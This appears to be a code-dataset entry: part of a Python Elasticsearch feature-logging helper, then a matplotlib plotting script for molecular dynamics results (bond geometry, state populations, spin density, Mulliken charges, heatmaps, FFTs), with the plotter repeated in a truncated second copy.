def flush_buffer(self):
"""
Flush buffer and push it to elasticsearch
:return: None
"""
if not self.actions_buffer:
return
# reset actions buffer and take what's currently in the list
actions = self.actions_buffer
self.actions_buffer = []
try:
elasticsearch.helpers.bulk(self.client, actions, stats_only=True)
except Exception as e:
# put actions back if it failed
self.actions_buffer.extend(actions)
raise
def create_data_record(self, data_dict):
"""
Create data record (dict) that is ready to be pushed to elasticsearch
:param data_dict:
:return: dict of elastic search record
:rtype: dict
"""
source_dict = deepcopy(data_dict)
assert not self.is_conflicting_keys(data_dict,
self.default_values), "Conflicting keys between default_values and extra_values"
source_dict.update(self.default_values)
return {
'_index': self.get_full_index(),
'_type': 'python_log',
'_source': source_dict
}
@classmethod
def is_conflicting_keys(cls, d1, d2):
"""
Return trur if there are conflicting keys between 2 dictionaries
:param d1:
:param d2:
:return:
"""
return bool(set(d1.keys()).intersection(set(d2.keys())))
def get_full_index(self):
"""
get index name
:rtype: str
:return: Index name with year and month attached to it
"""
datenow = datetime.datetime.utcnow()
index = '{index}-{year}.{month}'.format(index=self.index, year=datenow.year, month=datenow.month)
return index
@property
def default_values(self):
data_dict = {
Constants.HOST_KEY: socket.getfqdn(),
Constants.PROCESS_KEY: os.getpid(),
Constants.THREAD_NAME_KEY: threading.current_thread().name,
Constants.THREAD_ID_KEY: threading.current_thread().ident,
Constants.TIMESTAMP_KEY: str(datetime.datetime.utcnow().isoformat())
}
assert not self.is_conflicting_keys(data_dict,
self.extra_values), "Conflicting keys between default_values and extra_values"
data_dict.update(self.extra_values)
return data_dict
def validate_connection(self):
"""
ping server to make sure it's reachable. Raises exception if server cannot be reached
:return:
"""
for hostInfo in self.client.transport.hosts:
host = hostInfo.get('host')
port = hostInfo.get('port')
self.validate_server_connection(host, port)
@classmethod
def validate_server_connection(cls, host, port):
url = 'http://{}:{}'.format(host, port)
import requests
res = requests.get(url)
assert res.status_code == 200, "Failed to connect to ElasticSearch Server {}".format(url)
def log_feature(self, feature_name, feature_duration_seconds=None, levelname=Constants.INFO_VALUE, **kwargs):
"""
log feature and it to buffer, this will not push data immediately to elastic search. Subsequent call to flush_buffer is required if auto_flush is disabled
:param feature_name: feature name in string
:param feature_duration_seconds: time it took to complete this feature in seconds
:param levelname: Severity of this log (INFO, ERROR, WARN)
:param kwargs: additional values to be added to the record
:return:
"""
data_dict = {
Constants.FEATURE_NAME_KEY: feature_name,
Constants.LEVEL_NAME_KEY: levelname,
}
data_dict.update(**kwargs)
if feature_duration_seconds is not None:
data_dict.update({Constants.FEATURE_DURATION_KEY: feature_duration_seconds})
self.add_elasticsearch_records([data_dict])
def log_feature_error(self, feature_name, feature_duration_seconds=None, **kwargs):
"""
Log feature as an error, Same as log_feature but with levelname = ERROR
"""
self.log_feature(feature_name, feature_duration_seconds=feature_duration_seconds,
levelname=Constants.ERROR_VALUE, **kwargs)
def log_feature_decorator(self, feature_name, **feature_kwargs):
"""
Decorator to be used on any function, without changing its behavior. Each call to the decorated function will add it to buffer
:param feature_name: feature name in string
:param feature_kwargs: Additional values that will be added to each function call
:return:
"""
# create actual decorator, since this decorator take an argument of featureName
def decorator(function):
@functools.wraps(function)
def wrapper(*args, **kwargs):
start = time.time()
# execute function
try:
return_val = function(*args, **kwargs)
duration_seconds = time.time() - start
try:
self.log_feature(feature_name, duration_seconds, **feature_kwargs)
except Exception as e:
logging.debug("Couldn't log feature", exc_info=1)
return return_val
except Exception as e:
exc_text = traceback.format_exc()
duration_seconds = time.time() - start
exc_hash = hashlib.sha1(exc_text).hexdigest()
try:
self.log_feature_error(feature_name, duration_seconds,
exc_text=exc_text,
exc_hash=exc_hash,
exc_message=e.message,
**feature_kwargs)
except Exception as e:
logging.debug("Couldn't log feature error", exc_info=1)
raise
return wrapper
return decorator
class MockElasticSearchHelper(ElasticSearchHelper):
def __init__(self, *args, **kwargs):
super(MockElasticSearchHelper, self).__init__(client=None, index='none', auto_flush=False)
def validate_connection(self):
pass
def log_feature(self, *args, **kwargs):
pass
def log_feature_error(self, *args, **kwargs):
pass
def log_feature_decorator(self, feature_name, **feature_kwargs):
def decorator(function):
return function
return decorator
| 0.517083 | 0.21032 |
import mathutils
import numpy as np
import sys
import os
import json
if len(sys.argv) < 5:
print(f"""Not enough arguemnts!\n Use : {sys.argv[0]}
[/path/manifest.json]
=> [BL=1-2,2-3]
=> [PBL=1-2,2-3]
=> [NM=1,2,3]
=> [CIs=A|1,2,3]
=> [CSFs=A|1,2,3]
=> [CSFv=label:1,1,0,0_label:0,0,1,1]
=> [AVCSFs=A|1,2,3:av_window]
=> [AVCSFv=av_window_label:1,0,0_label:0,0,1]
=> [SD=A|1,2]
=> [MQ=A|1,2]
=> [HM=sd|mq:atom_num:nbins:min_y:max_y]
=> [FFT=cd|mq|csf:CHOP:[START:END]|A:1,2,3|A]
[width/panel, height]
[Output x11 | filename.png]
""")
sys.exit(-1)
ATOMICLABELS = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S',
'Cl', 'Ar', 'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se',
'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb',
'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra',
'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm', 'Md', 'No', 'Lr', 'Rf', 'Db', 'Sg',
'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og'] # Yes *all* of the elements
manifest_path = sys.argv[1]
commands = sys.argv[2:-2]
wpp, height = [float(i) for i in sys.argv[-2].split(',')]
OUTPUT = sys.argv[-1] # Either plot to a file or x11 window
assert(os.path.exists(manifest_path))
with open(manifest_path, 'r') as f:
manifest = json.load(f)
basepath = os.path.dirname(manifest_path)
times = np.load(os.path.join(basepath, 'times'))
nms = np.load(os.path.join(basepath, 'nm_ave'))
diabats = np.load(os.path.join(basepath, 'csf_ave'))
adiabats = np.load(os.path.join(basepath, 'ci_ave'))
avegeom = np.load(os.path.join(basepath, 'xyz_ave'))
mq = np.load(os.path.join(basepath, 'mq_ave'))
sd = np.load(os.path.join(basepath, 'sd_ave'))
nsteps = manifest['steps']
# DO PLOTTING
import matplotlib.pyplot as plt
# Define custom default colours - keep consistent between plots
# List lossely based on https://sashamaps.net/docs/resources/20-colors/
# Do this for the CSFs/CIs/FFT/NMs/MQ/SD
def get_nth_col(idx):
cols =['#e6194B', '#3cb44b', '#FFC800', '#4363d8', '#f58231', '#42d4f4', '#f032e6', '#fabed4', '#469990', '#dcbeff', '#9A6324', '#800000', '#aaffc3', '#000075', '#a9a9a9']
return cols[idx%len(cols)]
fig, axes = plt.subplots(1, len(commands), num=manifest_path, figsize=(wpp * len(commands), height))
if len(commands) == 1 : axes = [axes] # MPL messes with array if only one plot => Need to re-array
for n, c in enumerate(commands):
cmd, ins = c.split('=')
# GEOMETRICS
if cmd == 'BL':
BPS = []
for x in ins.split(','):
a, b = [int(z) for z in x.split('-')]
BPS.append([a,b])
for a in BPS:
dp = []
for x in range(nsteps):
dp.append(mathutils.MathUtils.bond_length(avegeom[x, a[0]-1],avegeom[x, a[1]-1] ))
try: alab1 = ATOMICLABELS[manifest['atomnos'][str(a[0])]-1]
except: alab1 = '?'
try: alab2 = ATOMICLABELS[manifest['atomnos'][str(a[1])]-1]
except: alab2 = '?'
axes[n].plot(times, dp, label=f'{alab1}[{a[0]}] - {alab2}[{a[1]}]')
axes[n].set_title('Bond lengths')
axes[n].set_ylabel('Bond length (Å)')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'PBL':
BPS = []
for x in ins.split(','):
a, b = [int(z) for z in x.split('-')]
BPS.append([a,b])
for a in BPS:
dp = []
init_bl = mathutils.MathUtils.bond_length(avegeom[0, a[0]-1],avegeom[0, a[1]-1] )
for x in range(nsteps):
bl = mathutils.MathUtils.bond_length(avegeom[x, a[0]-1],avegeom[x, a[1]-1] )
dp.append((bl - init_bl) / init_bl)
try: alab1 = ATOMICLABELS[manifest['atomnos'][str(a[0])]-1]
except: alab1 = '?'
try: alab2 = ATOMICLABELS[manifest['atomnos'][str(a[1])]-1]
except: alab2 = '?'
axes[n].plot(times, dp, label=f'{alab1}[{a[0]}] - {alab2}[{a[1]}]')
axes[n].set_title('Bond lengths (fractional)')
axes[n].set_ylabel('Fractional change')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'NM':
for x in [int(i) for i in ins.split(',')]:
axes[n].plot(times, nms[x-1], label=f'NM{x}', color=get_nth_col(x-1))
axes[n].set_title('Normal mode evolution')
axes[n].set_ylabel('Normal mode excitation')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'BA':
BPS = []
for x in ins.split(','):
a, b, c = [int(z) for z in x.split('-')]
BPS.append([a,b,c])
for a in BPS:
dp = []
for x in range(nsteps):
dp.append(mathutils.MathUtils.bond_angle(avegeom[x, a[0]-1],avegeom[x, a[1]-1], avegeom[x, a[2]-1] ))
try: alab1 = ATOMICLABELS[manifest['atomnos'][str(a[0])]-1]
except: alab1 = '?'
try: alab2 = ATOMICLABELS[manifest['atomnos'][str(a[1])]-1]
except: alab2 = '?'
try: alab3 = ATOMICLABELS[manifest['atomnos'][str(a[2])]-1]
except: alab3 = '?'
axes[n].plot(times, dp, label=f'{alab1}[{a[0]}] - {alab2}[{a[1]}] - {alab3}[{a[2]}]')
axes[n].set_ylabel('Bond angle (rad)')
axes[n].set_title('Bond angle')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'DA':
BPS = []
for x in ins.split(','):
a, b, c, d = [int(z) for z in x.split('-')]
BPS.append([a,b,c,d])
for a in BPS:
dp = []
for x in range(nsteps):
dha = mathutils.MathUtils.dihedral([avegeom[x, a[0]-1],avegeom[x, a[1]-1], avegeom[x, a[2]-1], avegeom[x, a[3]-1] ])
dp.append(dha)
try: alab1 = ATOMICLABELS[manifest['atomnos'][str(a[0])]-1]
except: alab1 = '?'
try: alab2 = ATOMICLABELS[manifest['atomnos'][str(a[1])]-1]
except: alab2 = '?'
try: alab3 = ATOMICLABELS[manifest['atomnos'][str(a[2])]-1]
except: alab3 = '?'
try: alab4 = ATOMICLABELS[manifest['atomnos'][str(a[3])]-1]
except: alab4 = '?'
axes[n].plot(times, dp, label=f'{alab1}[{a[0]}] - {alab2}[{a[1]}] - {alab3}[{a[2]}] - {alab4}[{a[3]}]')
axes[n].set_ylabel('Dihedral angle (rad)')
axes[n].set_title('Bond angle')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
# ELECTRONICS
elif cmd == 'CIs':
CI_STATES = None if ins=='A' else [int(i) for i in ins.split(',')]
for i in range(adiabats.shape[0]):
if CI_STATES == None: pass
else:
if i+1 not in CI_STATES: continue
axes[n].plot(times, adiabats[i], label=f'CI {i+1}', color=get_nth_col(i))
axes[n].set_title('Adiabatic [CI] state evolution')
axes[n].set_ylabel('State population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'CSFs':
CSF_STATES = None if ins=='A' else [int(i) for i in ins.split(',')]
for i in range(diabats.shape[0]):
if CSF_STATES == None: pass
else:
if i+1 not in CSF_STATES: continue
axes[n].plot(times, diabats[i], label=f'CSF {i+1}', color=get_nth_col(i))
axes[n].set_title('Diabatic [CSF] state evolution')
axes[n].set_ylabel('State population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'CSFv':
# Expect a list of label:1,1,0,0_label:0,0,1,1
to_plot={}
for i in ins.split('_'):
label, nums = i.split(':')
nums = [float(j) for j in nums.split(',')]
assert(len(nums)==diabats.shape[0])
to_plot[label] = np.array(nums)
for k, v in to_plot.items():
data = np.dot(v, diabats)
axes[n].plot(times, data, label=k)
axes[n].set_title('Diabatic [CSF] state vector evolution')
axes[n].set_ylabel('State population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'AVCSFs':
csfs, av_window = ins.split(':')
av_window = int(av_window)
CSF_STATES = None if csfs=='A' else [int(i) for i in csfs.split(',')]
for i in range(diabats.shape[0]):
if CSF_STATES == None: pass
else:
if i+1 not in CSF_STATES: continue
mav = mathutils.MathUtils.moving_avg(diabats[i], av_window)
axes[n].plot(times[:len(mav)], mav, label=f'AVCSF {i+1}', color=get_nth_col(i))
axes[n].set_title(f'{av_window} point moving average diabatic [CSF] state evolution')
axes[n].set_ylabel('Averaged state population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'AVCSFv':
# Expect format av_window_label:1,0,0_label:0,0,1
av_window, *toplt = ins.split('_')
av_window = int(av_window)
to_plot={}
for i in toplt:
print(i)
label, nums = i.split(':')
nums = [float(j) for j in nums.split(',')]
assert(len(nums)==diabats.shape[0])
to_plot[label] = np.array(nums)
mavs = np.array([mathutils.MathUtils.moving_avg(i, av_window) for i in diabats])
print(mavs.shape)
for k, v in to_plot.items():
data = np.dot(v, mavs)
axes[n].plot(times[:len(data)], data, label=k)
axes[n].set_title(f'{av_window} point moving average diabatic [CSF] state custom vector evolution')
axes[n].set_ylabel('Averaged state population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'SD':
SDS = None if ins=='A' else [int(i) for i in ins.split(',')]
for i in range(len(manifest['spindenmap'])):
atom_number = manifest['spindenmap'][i]
if SDS == None : pass
elif atom_number not in SDS: continue
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
axes[n].plot(times, sd[i], label='{} [{}]'.format(symbol, atom_number), color=get_nth_col(atom_number))
axes[n].set_title('Spin density evolution (H Summed)')
axes[n].set_ylabel('Spin density')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'MQ':
MQS = None if ins=='A' else [int(i) for i in ins.split(',')]
for i in range(len(manifest['mullikenmap'])):
atom_number = manifest['mullikenmap'][i]
if MQS == None : pass
elif atom_number not in MQS: continue
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
axes[n].plot(times, mq[i], label='{} [{}]'.format(symbol, atom_number), color=get_nth_col(atom_number))
axes[n].set_title('Mulliken charge evolution (H Summed)')
axes[n].set_ylabel('Mulliken charge')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
# Heatmaps - currently SD/MQ (may want to add BL)
elif cmd == 'HM':
def sbin_vals(nb, vals, val_scale, max_val, min_val):
x = np.zeros(nb)
step = (max_val-min_val)/nb
for n, v in enumerate(vals):
for i in range(nb):
if (min_val + i * step) < v < (min_val + (i+1) * step):
x[i] += val_scale[n]
return x[::-1]
def bin_vals(nb, vals, max_val, min_val):
val_len = len(vals)
return sbin_vals (nb, vals, np.repeat(1, val_len), max_val, min_val)
mode, selector, nbins, minval, maxval = ins.split(':')
nbins = int(nbins)
minval = float(minval)
maxval = float(maxval)
bindata = np.zeros((len(times), nbins))
if mode == 'sd':
atom_number = int(selector)
mapper = manifest['spindenmap'].index(atom_number)
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
axes[n].set_title(f'Spin denisity (H Summed) heatmap for atom {symbol}[{atom_number}]')
axes[n].set_xlabel('Spin density (H Summed)')
ave_data = np.load(os.path.join(basepath, 'sd_ave'))[mapper]
unbinned_data=np.load(os.path.join(basepath, 'sd'))[mapper]
elif mode == 'mq':
atom_number = int(selector)
mapper = manifest['mullikenmap'].index(atom_number)
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
axes[n].set_title(f'Mulliken charge (H Summed) heatmap for atom {symbol}[{atom_number}]')
axes[n].set_xlabel('Mulliken charge (H Summed)')
ave_data = np.load(os.path.join(basepath, 'mq_ave'))[mapper]
unbinned_data=np.load(os.path.join(basepath, 'mq'))[mapper]
else:
raise Exception(f"Illegal mode {mode} for heatmap")
for i, _ in enumerate(times):
bindata[i] = bin_vals(nbins, unbinned_data[i], maxval, minval)
axes[n].set_xlabel('Time (fs)')
timewidth = (times[1]-times[0])/2 # Tiny fudging to get heatmap to align nicely
axes[n].imshow(bindata.T, cmap='inferno', extent=(-timewidth, times[-1]+timewidth, minval, maxval), aspect='auto')
axes[n].plot(times, ave_data, color='white', linestyle='dotted',linewidth=2)
# FFT
elif cmd == 'FFT':
# [FFT=cd|mq|csf:CHOP:[START-END]|A]
mode, CHOP, RANGE, selector = ins.split(':')
CHOP=int(CHOP)
selector = None if selector == 'A' else [int(i) for i in selector.split(',')]
if mode == 'csf': data = diabats
elif mode == 'mq': data = mq
elif mode == 'sd': data = sd
else: raise Exception('Illegal FFT mode')
print(data.shape, len(times))
assert(data.shape[1] == len(times)) # Make sure extract worked
if RANGE != 'A':
s_idx, e_idx = [int(i) for i in RANGE.split('-')]
times_fft = times[s_idx:e_idx]
data_fft = data.T[s_idx:e_idx].T
else:
times_fft = times
data_fft = data
# Do FFT and plot up
N = data_fft.shape[1]
fig = plt.figure(num=manifest_path, figsize=(20.0, 15.0))
for i in range(data_fft.shape[0]):
if mode=='csf': # CSFs are picked by index
if selector == None : pass
elif i+1 not in selector: continue
ft = np.fft.fft(data_fft[i])
ft = ft.real**2 + ft.imag**2
freq = np.fft.fftfreq(N, d=times_fft[1]-times_fft[0])
if mode == 'sd' or mode == 'mq': # SD/MQ are picked based on atom number
if mode == 'sd' : atom_number = manifest['spindenmap'][i]
else : atom_number = manifest['mullikenmap'][i]
if selector == None : pass
elif atom_number not in selector: continue
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
label = f'{symbol}[{atom_number}]'
colour = get_nth_col(atom_number)
else:
label = f'CSF {i+1}'
colour = get_nth_col(i)
axes[n].plot(freq[CHOP:int(N/2)], ft[CHOP:int(N/2)], label=label, color=colour)
axes[n].set_title(f'FFT {mode}')
axes[n].set_ylabel('Intensity')
axes[n].set_xlabel('Frequency PHz')
axes[n].legend(loc='upper right')
else:
raise Exception(f'Illegal mode {cmd}')
fig.tight_layout()
if OUTPUT=='x11' : plt.show()
else: plt.savefig(OUTPUT, dpi=500)
|
analysis/plotter.py
|
import mathutils
import numpy as np
import sys
import os
import json
if len(sys.argv) < 5:
print(f"""Not enough arguemnts!\n Use : {sys.argv[0]}
[/path/manifest.json]
=> [BL=1-2,2-3]
=> [PBL=1-2,2-3]
=> [NM=1,2,3]
=> [CIs=A|1,2,3]
=> [CSFs=A|1,2,3]
=> [CSFv=label:1,1,0,0_label:0,0,1,1]
=> [AVCSFs=A|1,2,3:av_window]
=> [AVCSFv=av_window_label:1,0,0_label:0,0,1]
=> [SD=A|1,2]
=> [MQ=A|1,2]
=> [HM=sd|mq:atom_num:nbins:min_y:max_y]
=> [FFT=cd|mq|csf:CHOP:[START:END]|A:1,2,3|A]
[width/panel, height]
[Output x11 | filename.png]
""")
sys.exit(-1)
ATOMICLABELS = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S',
'Cl', 'Ar', 'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se',
'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb',
'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra',
'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm', 'Md', 'No', 'Lr', 'Rf', 'Db', 'Sg',
'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og'] # Yes *all* of the elements
manifest_path = sys.argv[1]
commands = sys.argv[2:-2]
wpp, height = [float(i) for i in sys.argv[-2].split(',')]
OUTPUT = sys.argv[-1] # Either plot to a file or x11 window
assert(os.path.exists(manifest_path))
with open(manifest_path, 'r') as f:
manifest = json.load(f)
basepath = os.path.dirname(manifest_path)
times = np.load(os.path.join(basepath, 'times'))
nms = np.load(os.path.join(basepath, 'nm_ave'))
diabats = np.load(os.path.join(basepath, 'csf_ave'))
adiabats = np.load(os.path.join(basepath, 'ci_ave'))
avegeom = np.load(os.path.join(basepath, 'xyz_ave'))
mq = np.load(os.path.join(basepath, 'mq_ave'))
sd = np.load(os.path.join(basepath, 'sd_ave'))
nsteps = manifest['steps']
# DO PLOTTING
import matplotlib.pyplot as plt
# Define custom default colours - keep consistent between plots
# List lossely based on https://sashamaps.net/docs/resources/20-colors/
# Do this for the CSFs/CIs/FFT/NMs/MQ/SD
def get_nth_col(idx):
cols =['#e6194B', '#3cb44b', '#FFC800', '#4363d8', '#f58231', '#42d4f4', '#f032e6', '#fabed4', '#469990', '#dcbeff', '#9A6324', '#800000', '#aaffc3', '#000075', '#a9a9a9']
return cols[idx%len(cols)]
fig, axes = plt.subplots(1, len(commands), num=manifest_path, figsize=(wpp * len(commands), height))
if len(commands) == 1 : axes = [axes] # MPL messes with array if only one plot => Need to re-array
for n, c in enumerate(commands):
cmd, ins = c.split('=')
# GEOMETRICS
if cmd == 'BL':
BPS = []
for x in ins.split(','):
a, b = [int(z) for z in x.split('-')]
BPS.append([a,b])
for a in BPS:
dp = []
for x in range(nsteps):
dp.append(mathutils.MathUtils.bond_length(avegeom[x, a[0]-1],avegeom[x, a[1]-1] ))
try: alab1 = ATOMICLABELS[manifest['atomnos'][str(a[0])]-1]
except: alab1 = '?'
try: alab2 = ATOMICLABELS[manifest['atomnos'][str(a[1])]-1]
except: alab2 = '?'
axes[n].plot(times, dp, label=f'{alab1}[{a[0]}] - {alab2}[{a[1]}]')
axes[n].set_title('Bond lengths')
axes[n].set_ylabel('Bond length (Å)')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'PBL':
BPS = []
for x in ins.split(','):
a, b = [int(z) for z in x.split('-')]
BPS.append([a,b])
for a in BPS:
dp = []
init_bl = mathutils.MathUtils.bond_length(avegeom[0, a[0]-1],avegeom[0, a[1]-1] )
for x in range(nsteps):
bl = mathutils.MathUtils.bond_length(avegeom[x, a[0]-1],avegeom[x, a[1]-1] )
dp.append((bl - init_bl) / init_bl)
try: alab1 = ATOMICLABELS[manifest['atomnos'][str(a[0])]-1]
except: alab1 = '?'
try: alab2 = ATOMICLABELS[manifest['atomnos'][str(a[1])]-1]
except: alab2 = '?'
axes[n].plot(times, dp, label=f'{alab1}[{a[0]}] - {alab2}[{a[1]}]')
axes[n].set_title('Bond lengths (fractional)')
axes[n].set_ylabel('Fractional change')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'NM':
for x in [int(i) for i in ins.split(',')]:
axes[n].plot(times, nms[x-1], label=f'NM{x}', color=get_nth_col(x-1))
axes[n].set_title('Normal mode evolution')
axes[n].set_ylabel('Normal mode excitation')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'BA':
BPS = []
for x in ins.split(','):
a, b, c = [int(z) for z in x.split('-')]
BPS.append([a,b,c])
for a in BPS:
dp = []
for x in range(nsteps):
dp.append(mathutils.MathUtils.bond_angle(avegeom[x, a[0]-1],avegeom[x, a[1]-1], avegeom[x, a[2]-1] ))
try: alab1 = ATOMICLABELS[manifest['atomnos'][str(a[0])]-1]
except: alab1 = '?'
try: alab2 = ATOMICLABELS[manifest['atomnos'][str(a[1])]-1]
except: alab2 = '?'
try: alab3 = ATOMICLABELS[manifest['atomnos'][str(a[2])]-1]
except: alab3 = '?'
axes[n].plot(times, dp, label=f'{alab1}[{a[0]}] - {alab2}[{a[1]}] - {alab3}[{a[2]}]')
axes[n].set_ylabel('Bond angle (rad)')
axes[n].set_title('Bond angle')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'DA':
BPS = []
for x in ins.split(','):
a, b, c, d = [int(z) for z in x.split('-')]
BPS.append([a,b,c,d])
for a in BPS:
dp = []
for x in range(nsteps):
dha = mathutils.MathUtils.dihedral([avegeom[x, a[0]-1],avegeom[x, a[1]-1], avegeom[x, a[2]-1], avegeom[x, a[3]-1] ])
dp.append(dha)
try: alab1 = ATOMICLABELS[manifest['atomnos'][str(a[0])]-1]
except: alab1 = '?'
try: alab2 = ATOMICLABELS[manifest['atomnos'][str(a[1])]-1]
except: alab2 = '?'
try: alab3 = ATOMICLABELS[manifest['atomnos'][str(a[2])]-1]
except: alab3 = '?'
try: alab4 = ATOMICLABELS[manifest['atomnos'][str(a[3])]-1]
except: alab4 = '?'
axes[n].plot(times, dp, label=f'{alab1}[{a[0]}] - {alab2}[{a[1]}] - {alab3}[{a[2]}] - {alab4}[{a[3]}]')
axes[n].set_ylabel('Dihedral angle (rad)')
axes[n].set_title('Bond angle')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
# ELECTRONICS
elif cmd == 'CIs':
CI_STATES = None if ins=='A' else [int(i) for i in ins.split(',')]
for i in range(adiabats.shape[0]):
if CI_STATES == None: pass
else:
if i+1 not in CI_STATES: continue
axes[n].plot(times, adiabats[i], label=f'CI {i+1}', color=get_nth_col(i))
axes[n].set_title('Adiabatic [CI] state evolution')
axes[n].set_ylabel('State population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'CSFs':
CSF_STATES = None if ins=='A' else [int(i) for i in ins.split(',')]
for i in range(diabats.shape[0]):
if CSF_STATES == None: pass
else:
if i+1 not in CSF_STATES: continue
axes[n].plot(times, diabats[i], label=f'CSF {i+1}', color=get_nth_col(i))
axes[n].set_title('Diabatic [CSF] state evolution')
axes[n].set_ylabel('State population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'CSFv':
# Expect a list of label:1,1,0,0_label:0,0,1,1
to_plot={}
for i in ins.split('_'):
label, nums = i.split(':')
nums = [float(j) for j in nums.split(',')]
assert(len(nums)==diabats.shape[0])
to_plot[label] = np.array(nums)
for k, v in to_plot.items():
data = np.dot(v, diabats)
axes[n].plot(times, data, label=k)
axes[n].set_title('Diabatic [CSF] state vector evolution')
axes[n].set_ylabel('State population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'AVCSFs':
csfs, av_window = ins.split(':')
av_window = int(av_window)
CSF_STATES = None if csfs=='A' else [int(i) for i in csfs.split(',')]
for i in range(diabats.shape[0]):
if CSF_STATES == None: pass
else:
if i+1 not in CSF_STATES: continue
mav = mathutils.MathUtils.moving_avg(diabats[i], av_window)
axes[n].plot(times[:len(mav)], mav, label=f'AVCSF {i+1}', color=get_nth_col(i))
axes[n].set_title(f'{av_window} point moving average diabatic [CSF] state evolution')
axes[n].set_ylabel('Averaged state population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'AVCSFv':
# Expect format av_window_label:1,0,0_label:0,0,1
av_window, *toplt = ins.split('_')
av_window = int(av_window)
to_plot={}
for i in toplt:
print(i)
label, nums = i.split(':')
nums = [float(j) for j in nums.split(',')]
assert(len(nums)==diabats.shape[0])
to_plot[label] = np.array(nums)
mavs = np.array([mathutils.MathUtils.moving_avg(i, av_window) for i in diabats])
print(mavs.shape)
for k, v in to_plot.items():
data = np.dot(v, mavs)
axes[n].plot(times[:len(data)], data, label=k)
axes[n].set_title(f'{av_window} point moving average diabatic [CSF] state custom vector evolution')
axes[n].set_ylabel('Averaged state population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'SD':
SDS = None if ins=='A' else [int(i) for i in ins.split(',')]
for i in range(len(manifest['spindenmap'])):
atom_number = manifest['spindenmap'][i]
if SDS == None : pass
elif atom_number not in SDS: continue
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
axes[n].plot(times, sd[i], label='{} [{}]'.format(symbol, atom_number), color=get_nth_col(atom_number))
axes[n].set_title('Spin density evolution (H Summed)')
axes[n].set_ylabel('Spin density')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'MQ':
MQS = None if ins=='A' else [int(i) for i in ins.split(',')]
for i in range(len(manifest['mullikenmap'])):
atom_number = manifest['mullikenmap'][i]
if MQS == None : pass
elif atom_number not in MQS: continue
